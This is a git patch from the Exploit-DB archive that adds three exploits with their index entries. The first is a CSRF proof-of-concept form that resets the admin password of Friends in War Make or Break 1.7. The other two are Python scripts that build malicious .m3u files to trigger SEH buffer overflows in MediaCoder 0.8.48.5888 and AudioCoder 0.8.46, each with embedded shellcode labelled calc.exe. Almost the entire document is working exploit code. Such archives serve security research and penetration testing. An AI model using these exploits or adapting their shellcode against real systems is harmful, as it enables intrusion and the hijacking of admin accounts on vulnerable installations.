From 82b7d150c6f7a6ee62674b8a5d18eaa47c7718fa Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 28 Jul 2017 05:01:21 +0000
Subject: [PATCH] DB: 2017-07-28

3 new exploits

MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)
AudioCoder 0.8.46 - Local Buffer Overflow (SEH)

Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)
---
 files.csv                        |  3 ++
 platforms/php/webapps/42383.html | 17 ++++++++++
 platforms/windows/local/42384.py | 54 ++++++++++++++++++++++++++++++++
 platforms/windows/local/42385.py | 52 ++++++++++++++++++++++++++++++
 4 files changed, 126 insertions(+)
 create mode 100755 platforms/php/webapps/42383.html
 create mode 100755 platforms/windows/local/42384.py
 create mode 100755 platforms/windows/local/42385.py
diff --git a/files.csv b/files.csv
index 582ab7d54..f376482aa 100644
--- a/files.csv
+++ b/files.csv
@@ -9153,6 +9153,8 @@ id,file,description,date,author,platform,type,port
 42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0
 42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0
 42382,platforms/windows/local/42382.rb,"Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0
+42384,platforms/windows/local/42384.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
+42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -38182,4 +38184,5 @@ id,file,description,date,author,platform,type,port
 42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0
 42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
 42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
+42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0
 42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/42383.html b/platforms/php/webapps/42383.html
new file mode 100755
index 000000000..56173d837
--- /dev/null
+++ b/platforms/php/webapps/42383.html
@@ -0,0 +1,17 @@
+Friends in War Make or Break 1.7 - Unauthenticated admin password change
+
+Url: http://software.friendsinwar.com/
+     http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
+
+Author: shinnai
+mail: shinnai[at]autistici[dot]org
+site: http://www.shinnai.altervista.org/
+---------------------------------------------------------------------
+
+PROOF OF CONCEPT:
+<form method="post" action="http://localhost/mob/admin/pass_edit.php?username=1">
+	<label>1) Choose a new password<br>2) Click on "Submit"<br>3) Login using "admin" and your new password<br><br></label>
+	<input type="text" name="password" value="ChangeMe">
+	<input type="text" name="submit" value="Edit+Password" hidden=true>
+	<input type="submit" value="Submit">
+</form>
diff --git a/platforms/windows/local/42384.py b/platforms/windows/local/42384.py
new file mode 100755
index 000000000..c12c09a5e
--- /dev/null
+++ b/platforms/windows/local/42384.py
@@ -0,0 +1,54 @@
+#!/usr/bin/python
+# Exploit Title      : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH)
+# CVE				 : CVE-2017-8869
+# Exploit Author     : Muhann4d @0xSecured
+# Vendor Homepage    : http://www.mediacoderhq.com
+# Vulnerable Software: http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe
+# Vulnerable Version : 0.8.48.5888
+# Fixed version      : 0.8.49.5890 http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.49.5890.exe
+# Category           : Local Buffer Overflow
+# Tested on OS       : Windows 7 Pro SP1 32bit
+# How to             : Open MediaCoder then drag & drop the .m3u file in it and then press the START button.
+#					   or just write click on the .mu3 file .. open with .. MediaCoder
+# Timeline 	: 
+# 2017-05-05: Vulnerability discovered, vendor has been contaced
+# 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version" 
+# 2017-05-09: A POC sent to the vendor.
+# 2017-05-11: New version is released. According to http://blog.mediacoderhq.com/changelog/
+# 2017-06-26: Exploit released.
+
+print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d @0xSecured"
+from struct import pack
+ 
+junk = "http://" + "\x41" * 361
+nseh = pack('<I',0x909006eb)
+seh = pack('<I',0x66017187)
+nops= "\x90" * 20
+#calc.exe
+shell=("\xbe\xb6\x06\x32\x7a\xda\xd1\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
+"\x31\x31\x72\x13\x03\x72\x13\x83\xea\x4a\xe4\xc7\x86\x5a\x6b"
+"\x27\x77\x9a\x0c\xa1\x92\xab\x0c\xd5\xd7\x9b\xbc\x9d\xba\x17"
+"\x36\xf3\x2e\xac\x3a\xdc\x41\x05\xf0\x3a\x6f\x96\xa9\x7f\xee"
+"\x14\xb0\x53\xd0\x25\x7b\xa6\x11\x62\x66\x4b\x43\x3b\xec\xfe"
+"\x74\x48\xb8\xc2\xff\x02\x2c\x43\xe3\xd2\x4f\x62\xb2\x69\x16"
+"\xa4\x34\xbe\x22\xed\x2e\xa3\x0f\xa7\xc5\x17\xfb\x36\x0c\x66"
+"\x04\x94\x71\x47\xf7\xe4\xb6\x6f\xe8\x92\xce\x8c\x95\xa4\x14"
+"\xef\x41\x20\x8f\x57\x01\x92\x6b\x66\xc6\x45\xff\x64\xa3\x02"
+"\xa7\x68\x32\xc6\xd3\x94\xbf\xe9\x33\x1d\xfb\xcd\x97\x46\x5f"
+"\x6f\x81\x22\x0e\x90\xd1\x8d\xef\x34\x99\x23\xfb\x44\xc0\x29"
+"\xfa\xdb\x7e\x1f\xfc\xe3\x80\x0f\x95\xd2\x0b\xc0\xe2\xea\xd9"
+"\xa5\x13\x1a\xd0\x33\x83\x85\x81\x7e\xc9\x35\x7c\xbc\xf4\xb5"
+"\x75\x3c\x03\xa5\xff\x39\x4f\x61\x13\x33\xc0\x04\x13\xe0\xe1"
+"\x0c\x70\x67\x72\xcc\x59\x02\xf2\x77\xa6")
+
+junkD = "D" * (2960 - (len(junk + nseh + seh + nops + shell)))
+exploit = junk + nseh + seh + nops + shell + junkD
+  
+try:
+    file= open("Exploit.m3u",'w')
+    file.write(exploit)
+    file.close()
+    raw_input("\nExploit has been created!\n")
+except:
+    print "There has been an Error"
+	
diff --git a/platforms/windows/local/42385.py b/platforms/windows/local/42385.py
new file mode 100755
index 000000000..da798527b
--- /dev/null
+++ b/platforms/windows/local/42385.py
@@ -0,0 +1,52 @@
+#!/usr/bin/python
+# Exploit Title      : AudioCoder 0.8.46 Local Buffer Overflow (SEH)
+# CVE				 : CVE-2017-8870
+# Exploit Author     : Muhann4d @0xSecured
+# Vendor Homepage    : http://www.mediacoderhq.com
+# Vulnerable Software: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=AudioCoder-0.8.46.exe
+# Vulnerable Version : 0.8.46
+# Fixed version      : N/A
+# Category           : Local Buffer Overflow
+# Tested on OS       : Windows 7 Pro SP1 32bit
+# How to             : Open AudioCoder then drag & drop the .m3u file in it and then press the START button.
+# Timeline 	: 
+# 2017-05-05: Vulnerability discovered, vendor has been contaced
+# 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version" 
+# 2017-05-09: A POC sent to the vendor. No reply since then.
+# 2017-06-26: Exploit released.
+ 
+print "AudioCoder 0.8.46 Local Buffer Overflow By Muhann4d @0xSecured"
+from struct import pack
+
+junk = "http://" + "\x41" * 741
+nseh = pack('<I',0x909006eb)
+seh = pack('<I',0x66015926)
+nops= "\x90" * 20
+shell=("\xb8\x9d\x01\x15\xd1\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
+"\x32\x31\x42\x12\x03\x42\x12\x83\x77\xfd\xf7\x24\x7b\x16\x7e"
+"\xc6\x83\xe7\xe1\x4e\x66\xd6\x33\x34\xe3\x4b\x84\x3e\xa1\x67"
+"\x6f\x12\x51\xf3\x1d\xbb\x56\xb4\xa8\x9d\x59\x45\x1d\x22\x35"
+"\x85\x3f\xde\x47\xda\x9f\xdf\x88\x2f\xe1\x18\xf4\xc0\xb3\xf1"
+"\x73\x72\x24\x75\xc1\x4f\x45\x59\x4e\xef\x3d\xdc\x90\x84\xf7"
+"\xdf\xc0\x35\x83\xa8\xf8\x3e\xcb\x08\xf9\x93\x0f\x74\xb0\x98"
+"\xe4\x0e\x43\x49\x35\xee\x72\xb5\x9a\xd1\xbb\x38\xe2\x16\x7b"
+"\xa3\x91\x6c\x78\x5e\xa2\xb6\x03\x84\x27\x2b\xa3\x4f\x9f\x8f"
+"\x52\x83\x46\x5b\x58\x68\x0c\x03\x7c\x6f\xc1\x3f\x78\xe4\xe4"
+"\xef\x09\xbe\xc2\x2b\x52\x64\x6a\x6d\x3e\xcb\x93\x6d\xe6\xb4"
+"\x31\xe5\x04\xa0\x40\xa4\x42\x37\xc0\xd2\x2b\x37\xda\xdc\x1b"
+"\x50\xeb\x57\xf4\x27\xf4\xbd\xb1\xd8\xbe\x9c\x93\x70\x67\x75"
+"\xa6\x1c\x98\xa3\xe4\x18\x1b\x46\x94\xde\x03\x23\x91\x9b\x83"
+"\xdf\xeb\xb4\x61\xe0\x58\xb4\xa3\x83\x3f\x26\x2f\x44")
+#calc.exe
+
+junkD = "D" * (2572 - (len(junk + nseh + seh + nops + shell)))
+exploit = junk + nseh + seh + nops + shell + junkD
+  
+try:
+    file= open("Exploit.m3u",'w')
+    file.write(exploit)
+    file.close()
+    raw_input("\nExploit has been created!\n")
+except:
+    print "There has been an Error"
+	
